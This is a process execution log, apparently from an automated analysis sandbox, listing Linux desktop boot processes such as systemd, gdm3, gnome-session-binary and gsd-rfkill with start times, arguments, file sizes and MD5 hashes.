                                                      Start time (UTC):00:27:54
                                                      Start date (UTC):07/01/2025
                                                      Path:/usr/lib/systemd/system-environment-generators/snapd-env-generator
                                                      Arguments:/usr/lib/systemd/system-environment-generators/snapd-env-generator
                                                      File size:22760 bytes
                                                      MD5 hash:3633b075f40283ec938a2a6a89671b0e

                                                      Start time (UTC):00:27:55
                                                      Start date (UTC):07/01/2025
                                                      Path:/usr/lib/systemd/systemd
                                                      Arguments:-
                                                      File size:1620224 bytes
                                                      MD5 hash:9b2bec7092a40488108543f9334aab75

                                                      Start time (UTC):00:27:55
                                                      Start date (UTC):07/01/2025
                                                      Path:/usr/lib/systemd/system-environment-generators/snapd-env-generator
                                                      Arguments:/usr/lib/systemd/system-environment-generators/snapd-env-generator
                                                      File size:22760 bytes
                                                      MD5 hash:3633b075f40283ec938a2a6a89671b0e

                                                      Start time (UTC):00:27:56
                                                      Start date (UTC):07/01/2025
                                                      Path:/usr/libexec/gnome-session-binary
                                                      Arguments:-
                                                      File size:334664 bytes
                                                      MD5 hash:d9b90be4f7db60cb3c2d3da6a1d31bfb

                                                      Start time (UTC):00:27:56
                                                      Start date (UTC):07/01/2025
                                                      Path:/bin/sh
                                                      Arguments:/bin/sh -e -u -c "export GIO_LAUNCHED_DESKTOP_FILE_PID=$$; exec \"$@\"" sh /usr/libexec/gsd-rfkill
                                                      File size:129816 bytes
                                                      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                      Start time (UTC):00:27:56
                                                      Start date (UTC):07/01/2025
                                                      Path:/usr/libexec/gsd-rfkill
                                                      Arguments:/usr/libexec/gsd-rfkill
                                                      File size:51808 bytes
                                                      MD5 hash:88a16a3c0aba1759358c06215ecfb5cc

                                                      Start time (UTC):00:27:57
                                                      Start date (UTC):07/01/2025
                                                      Path:/usr/sbin/gdm3
                                                      Arguments:-
                                                      File size:453296 bytes
                                                      MD5 hash:2492e2d8d34f9377e3e530a61a15674f

                                                      Start time (UTC):00:27:57
                                                      Start date (UTC):07/01/2025
                                                      Path:/etc/gdm3/PrimeOff/Default
                                                      Arguments:/etc/gdm3/PrimeOff/Default
                                                      File size:129816 bytes
                                                      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                      Start time (UTC):00:27:57
                                                      Start date (UTC):07/01/2025
                                                      Path:/usr/sbin/gdm3
                                                      Arguments:-
                                                      File size:453296 bytes
                                                      MD5 hash:2492e2d8d34f9377e3e530a61a15674f

                                                      Start time (UTC):00:27:57
                                                      Start date (UTC):07/01/2025
                                                      Path:/etc/gdm3/PrimeOff/Default
                                                      Arguments:/etc/gdm3/PrimeOff/Default
                                                      File size:129816 bytes
                                                      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                      Start time (UTC):00:28:07
                                                      Start date (UTC):07/01/2025
                                                      Path:/usr/lib/systemd/systemd
                                                      Arguments:-
                                                      File size:1620224 bytes
                                                      MD5 hash:9b2bec7092a40488108543f9334aab75

                                                      Start time (UTC):00:28:07
                                                      Start date (UTC):07/01/2025
                                                      Path:/lib/systemd/systemd-user-runtime-dir
                                                      Arguments:/lib/systemd/systemd-user-runtime-dir stop 127
                                                      File size:22672 bytes
                                                      MD5 hash:d55f4b0847f88131dbcfb07435178e54